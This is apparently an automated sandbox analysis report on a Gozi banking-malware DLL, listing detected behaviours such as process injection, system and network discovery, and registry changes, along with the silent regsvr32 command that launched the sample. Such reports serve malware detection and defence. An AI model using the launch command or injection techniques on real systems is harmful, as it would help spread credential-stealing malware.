Analysis Overview
SHA256
ee46bd47dbd009333a72bc752b3d38d5a87a25f90fef3d4d77515d4fd11f3c8d
Threat Level: Known bad
The file 8fcfb8f38d8607c57f08f9b39139065f was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Enumerates processes with tasklist
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Gathers system information
Discovers systems in the same network
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-03 10:56
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-03 10:56
Reported
2022-08-03 10:58
Platform
win7-20220715-en
Max time kernel
87s
Max time network
44s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1064 wrote to memory of 1660 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
Network
Files
memory/1064-54-0x000007FEFC251000-0x000007FEFC253000-memory.dmp
memory/1660-55-0x0000000000000000-mapping.dmp
memory/1660-56-0x00000000760E1000-0x00000000760E3000-memory.dmp
memory/1660-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1660-62-0x00000000001A0000-0x00000000001AD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-03 10:56
Reported
2022-08-03 10:58
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1728 set thread context of 2588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 2588 set thread context of 3396 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2588 set thread context of 3664 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2588 set thread context of 3520 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2588 set thread context of 4752 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d898b3f779591c13da1f2b28ce32141fe3eb569a7d6f4a1152ba756aad77d00" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a94ab9e0a277a1865d03111cc1a70ac901b509c24bef77035af18ae5203b6e37" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e4a7ec7f38a7d8018c66ae9238a7d8018c66ae9238a7d801a67d08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000316337343330316536313435343930633637333336316134356530633030393230643635323638333034323838616237653265306230666636373134613537620000b20009000400efbe03551a6703551a672e00000000000000000000000000000000000000000000000000b44ad300310063003700340033003000310065003600310034003500340039003000630036003700330033003600310061003400350065003000630030003000390032003000640036003500320036003800330030003400320038003800610062003700650032006500300062003000660066003600370031003400610035003700620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31633734333031653631343534393063363733333631613435653063303039323064363532363833303432383861623765326530623066663637313461353762000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca590d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca590d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b987cab8-05db-4909- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\071ae30bc7365699d044a75ba8191e4d9c39200fc27b8565d88dae1ec87013d4" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000761de37f38a7d801bde8289238a7d801bde8289238a7d801fa580d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000626639623338316330663664366336383433633665373562313431623239303232633939653565616639626137626434623131623539393833626563323664360000b20009000400efbe03551a6703551a672e0000000000000000000000000000000000000000000000000052d5dc00620066003900620033003800310063003000660036006400360063003600380034003300630036006500370035006200310034003100620032003900300032003200630039003900650035006500610066003900620061003700620064003400620031003100620035003900390038003300620065006300320036006400360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c62663962333831633066366436633638343363366537356231343162323930323263393965356561663962613762643462313162353939383362656332366436000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca090d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca090d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = e80b8e9238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\80ce800c-4267-4baa- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002849ac7f38a7d801e36b329238a7d801e36b329238a7d8019f5112000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000366438393862336637373935393163313364613166326232386365333231343166653365623536396137643666346131313532626137353661616437376430300000b20009000400efbe03551a6703551a672e000000000000000000000000000000000000000000000000003274da00360064003800390038006200330066003700370039003500390031006300310033006400610031006600320062003200380063006500330032003100340031006600650033006500620035003600390061003700640036006600340061003100310035003200620061003700350036006100610064003700370064003000300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36643839386233663737393539316331336461316632623238636533323134316665336562353639613764366634613131353262613735366161643737643030000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca190d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca190d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\1c74301e6145490c673361a45e0c00920d65268304288ab7e2e0b0ff6714a57b" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67746a65-1fa0-4632- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = 9c256d9238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008f7fe57f38a7d8018f66709238a7d8018f66709238a7d80114a80c000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000613934616239653061323737613138363564303331313163633161373061633930316235303963323462656637373033356166313861653532303362366533370000b20009000400efbe03551a6703551a672e000000000000000000000000000000000000000000000000003c95e100610039003400610062003900650030006100320037003700610031003800360035006400300033003100310031006300630031006100370030006100630039003000310062003500300039006300320034006200650066003700370030003300350061006600310038006100650035003200300033006200360065003300370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000